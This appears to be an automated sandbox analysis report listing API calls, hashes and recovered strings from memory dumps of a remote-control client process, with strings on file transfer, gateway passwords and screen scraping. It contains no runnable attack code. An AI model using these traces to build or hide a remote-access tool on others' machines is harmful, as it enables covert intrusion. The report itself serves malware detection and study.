                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1317707293-0
                                                                                                                                                                                                    • Opcode ID: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
                                                                                                                                                                                                    • Instruction ID: 1c6fdd3f784209e1156a4ff31251cb138f082964e1cd822c4cbcc4281ff6dda7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2851FC75A01229AFDB11DBA4CC88FAEF7B9FF89304F108199F605D7244DB749A448F62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 1100380F
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1100382A
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 1100383D
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003854
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100386B
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 11003882
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110038A5
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 110038BC
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110038D3
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110038EA
                                                                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11003901
                                                                                                                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 11003908
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FD), ref: 11003916
                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003932
                                                                                                                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 1100393B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11003949
                                                                                                                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003962
                                                                                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 11003976
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11003984
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100398E
                                                                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100399C
                                                                                                                                                                                                    • CreatePen.GDI32(?,00000001,00000000), ref: 110039A5
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110039B2
                                                                                                                                                                                                    • MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039CE
                                                                                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 110039E5
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110039F3
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110039FA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1903512896-0
                                                                                                                                                                                                    • Opcode ID: 1ab8ec13b9c3d8d80ecb74cf7a7032847e3083b317342f6409bc525a428a3736
                                                                                                                                                                                                    • Instruction ID: 3027e757ba1171f6112b6b60bda5e7e925a43277d9ff2db94d61a7c43587e01c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ab8ec13b9c3d8d80ecb74cf7a7032847e3083b317342f6409bc525a428a3736
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2814FB590030AAFDB14DFA4CC85FBFF7B9EF88304F104A58E611A7285D671A945CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                    • String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
                                                                                                                                                                                                    • API String ID: 1452528299-2149975586
                                                                                                                                                                                                    • Opcode ID: 561c0988f8f1cc5d3af2330b1a598cc42cb55d53adb4fc4d2a8da90c4d46ed25
                                                                                                                                                                                                    • Instruction ID: 3de54ac4933e972391479bb2181c1356488e076a28c88e23173637e5c91d3217
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 561c0988f8f1cc5d3af2330b1a598cc42cb55d53adb4fc4d2a8da90c4d46ed25
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B1A6B6D00218ABDB24DBF4CC44FEEB778AF55308F908159E518A7245EB31DA45CFA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,765A5530), ref: 11141457
                                                                                                                                                                                                    • ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110433F9
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11043558
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,?), ref: 110435F2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000002,?), ref: 11043627
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11043676
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,11190240), ref: 1104368E
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 110436CA
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110436E3
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110436F8
                                                                                                                                                                                                      • Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 11043705
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 1104372A
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 11043731
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemWindow$Text$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimerwsprintf
                                                                                                                                                                                                    • String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
                                                                                                                                                                                                    • API String ID: 2161888955-1930157642
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 110424D0: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104253A
                                                                                                                                                                                                      • Part of subcall function 110424D0: GetWindowLongA.USER32(00000000,000000F0), ref: 11042541
                                                                                                                                                                                                      • Part of subcall function 110424D0: IsWindow.USER32(00000000), ref: 1104254E
                                                                                                                                                                                                      • Part of subcall function 110424D0: GetWindowRect.USER32(00000000,11049320), ref: 11042565
                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 11049334
                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,?,?,00000000), ref: 1104935B
                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000040), ref: 1104936D
                                                                                                                                                                                                    • WaitForInputIdle.USER32(?,000003E8), ref: 11049488
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 1104949B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 110494A4
                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 110494AD
                                                                                                                                                                                                    • EnumWindows.USER32(110425D0,?), ref: 11049504
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11049520
                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,?,?,?,?,?,00000000), ref: 1104953A
                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000040), ref: 11049549
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows
                                                                                                                                                                                                    • String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
                                                                                                                                                                                                    • API String ID: 3920443244-2853765610
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 1108B5A8
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 1108B5BA
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B5C1
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 1108B5D7
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 1108B5F5
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 1108B601
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B608
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 1108B61E
                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 1108B640
                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 1108B659
                                                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1108B6CF
                                                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1108B6E7
                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 1108B709
                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 1108B725
                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 1108B745
                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 1108B75F
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B779
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B77C
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B788
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B78B
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B797
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B79A
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B7A6
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B7A9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeapSecurity$DescriptorObjectProcessUser$DaclFree$AllocInitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3868453208-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 110ED2AE
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000F), ref: 110ED2C2
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110ED33A
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED34B
                                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 110ED351
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED36C
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000001), ref: 110ED380
                                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 110ED383
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110ED38B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1969595663-0
                                                                                                                                                                                                    • Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                                                                                                    • Instruction ID: 99ab53906cf2362fb71f393f1a059b673ec6ad63d3e9dfc730451934018f7e7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 747193B1E01229AFDB01DFE9CC89BEEB7B9FF88714F148056FA15E7244D67499008B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,BBC4A55B,00000001,?,?,00000000,11185E66,000000FF,?,1110421F,00000000,?,?,?), ref: 1110332D
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetVersion.KERNEL32(00000000,75C20BD0,00000000), ref: 111347F3
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134814
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134824
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 11134841
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1113484D
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,1110421F,00000000,?,?,?), ref: 1110337F
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 111033B6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 1110343F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 111034C1
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111034E3
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111034F0
                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11103509
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110421F), ref: 11103570
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110421F), ref: 11103597
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,1110421F), ref: 111035EF
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                                                                                      • Part of subcall function 11103110: EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                                                                                      • Part of subcall function 11103110: LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: WaitForSingleObject.KERNEL32(?,00000000,?,?,111049C5,?,TerminateVistaUI), ref: 110F3BC1
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: InterlockedExchange.KERNEL32(?,00000000), ref: 110F3BCD
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: CloseHandle.KERNEL32(00000000), ref: 110F3BD8
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: InterlockedIncrement.KERNEL32(111EC5B4), ref: 110F3C05
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 111035F6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103646
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103651
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait
                                                                                                                                                                                                    • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
                                                                                                                                                                                                    • API String ID: 2847773570-617439319
                                                                                                                                                                                                    • Opcode ID: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                                                                                                    • Instruction ID: 7102d60838122e4a6cb8a6baed9df5fda1baf24c5a04c60c3b4407c25d2de74c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80A14975D0426A9FDB249F558DC5ADEFBB4BB08304F4085EEE659E3240D7705AC08F61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
                                                                                                                                                                                                    • ShowCursor.USER32(00000000), ref: 110F53D8
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F5443
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F544C
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110F5473
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F549E
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F54A7
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
                                                                                                                                                                                                    • ShowCursor.USER32(00000001), ref: 110F54C2
                                                                                                                                                                                                    • SetCursor.USER32(?), ref: 110F54CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpenwsprintf
                                                                                                                                                                                                    • String ID: NSLockExit$|ZvZv
                                                                                                                                                                                                    • API String ID: 3796038594-999940717
                                                                                                                                                                                                    • Opcode ID: f1b6d6177d52e0c3756226750f04fdb34155f1e8b4de2aa2837cdf87b9045ced
                                                                                                                                                                                                    • Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b6d6177d52e0c3756226750f04fdb34155f1e8b4de2aa2837cdf87b9045ced
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                                                                                                      • Part of subcall function 110EAED0: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,BBC4A55B), ref: 110EAEEC
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000043), ref: 110276A4
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110276CB
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110276F5
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027785
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102779C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110277A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcesswsprintf$AddressCurrentMetricsNameProcSystemVersion
                                                                                                                                                                                                    • String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
                                                                                                                                                                                                    • API String ID: 3843341194-531500863
                                                                                                                                                                                                    • Opcode ID: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction ID: d2b55fc42617096dc1e54143e0f6b596911c59ff24b6e1298e75f3af09eb386e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41FA74E4062AAAEB50DBA0CC85FEDF7B8AB14708F1041D5E929B72C0EB70B544CB54
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 689C59B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                    • String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
                                                                                                                                                                                                    • API String ID: 1659193697-3520600413
                                                                                                                                                                                                    • Opcode ID: b59d6027687ca4a8ecdc319d407504c2855ee51ec30457b67e0a42384d323df9
                                                                                                                                                                                                    • Instruction ID: aac51dd48ee64db2422d787cd1183d78277d01f4d8be0deac49c3ab65f8c2f48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b59d6027687ca4a8ecdc319d407504c2855ee51ec30457b67e0a42384d323df9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57A174B5940218BFDB15DBA4CC98FAFB37CAF95308F8045D9E50966140EB71EA848F63
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111211B5
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
                                                                                                                                                                                                    • String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
